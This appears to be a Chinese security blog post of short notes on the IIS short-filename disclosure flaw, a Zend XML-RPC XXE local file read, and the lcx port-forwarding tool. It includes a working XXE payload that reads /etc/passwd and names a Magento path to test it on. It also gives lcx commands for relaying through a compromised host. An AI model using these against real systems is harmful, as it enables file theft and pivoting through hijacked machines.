`

最近接触的几个技术随笔

 
阅读更多

1.IIS短文件和文件夹泄漏漏洞

   这个漏洞具体可以看核攻击大牛的blog:http://lcx.cc/?i=2643

 

   我大概谈谈我的理解吧,由于历史遗留问题,在windows系统中会对长度超过8个字母的文件夹和后缀超过3个时,会生成一个对应的8.3格式的短文件,而这个文件则是可以通过*和~来进行通配预测的,具体类似于sql盲注,

   有人写了个java板的利用工具,但是实际使用中你会发现,你只能预测到前六个字母类似于upload~1.asp这种,实际危害还是比较有限的。

 

 

2.zend xml rpc本地文件读取漏洞

   这个漏洞具体可以看:http://zone.wooyun.org/content/531

   这个也是比较有意思的

 

<?xml version="1.0"?>
 <!DOCTYPE foo [    
<!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" >]>
<methodCall>  
<methodName>
&xxe;
</methodName>
</methodCall>

 其中的xxe是比较关键的  以及后面的那个


xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" 

  但在实际中我没能找到例子来实验,

 

不过根据我的分析在mageoto中应该采用了这个zend 模块,具体的路径是

 

lib/Zend/XmlRpc/Server.php

 

大家可以自行实验,

 

3.试验了下lcx端口转发,第一次用留个纪念

 

lcx.exe -slave 本人ip 端口a  肉鸡ip 端口b

lcx.exe -listen 端口a 端口c

 

 

 

 

分享到:
评论

相关推荐

    信息技术教学随笔.doc

    这一代学生生活在一个Windows 10甚至更高版本操作系统普及的时代,日常接触的软件也是更新颖的版本。在这样的背景下,如何让教材内容与学生的实际需求和兴趣相匹配,成为了一个迫在眉睫的问题。 为了解决这一难题,...

    电磁轨道炮仿真模型,电磁轨道炮的Comsol多物理场仿真模型:全过程的电枢加速与动网格实现,comsol仿真,多物理场仿真 电磁轨道炮comsol模型 可仿真电枢加速全过程 动网格实现 ,comso

    在技术博客和技术随笔等文档中,作者们可能会分享他们在使用Comsol软件进行电磁轨道炮仿真时的心得体会,包括建模技巧、仿真遇到的问题及解决方案等。这些内容对于电磁轨道炮的研究人员和工程师来说,是非常有价值的...

    网上教研总结合集

    网络教研的优势主要体现在以下几个方面: 1. 查阅资料的便利性:网络教研为教师提供了快捷方便的资料检索与下载途径,使教师能够迅速获取教学所需的课件、教学设计等资源,有效提升教学效率。 2. 交流合作和分享...

    关于有益作文300字六篇.docx

    根据给定文件的信息,我们可以提炼出以下几个主要的知识点: ### 1. 阅读的重要性 - **定义**: 阅读是一种通过视觉感知文字,理解其含义,并从中获取信息和知识的过程。 - **作用**: 提高个人素养,增强语言表达...

    c#学习笔记.txt

    如前所述,我是一个狮子座男人,一度我认为学习Java会使我看起来与众不同,可是几个月以后我放弃了这个选择,我看了论坛里关于这两种语言孰优孰劣的讨论,最终选择了C#,请不要问我为何做出这样的选择,很多人认为...

Global site tag (gtag.js) - Google Analytics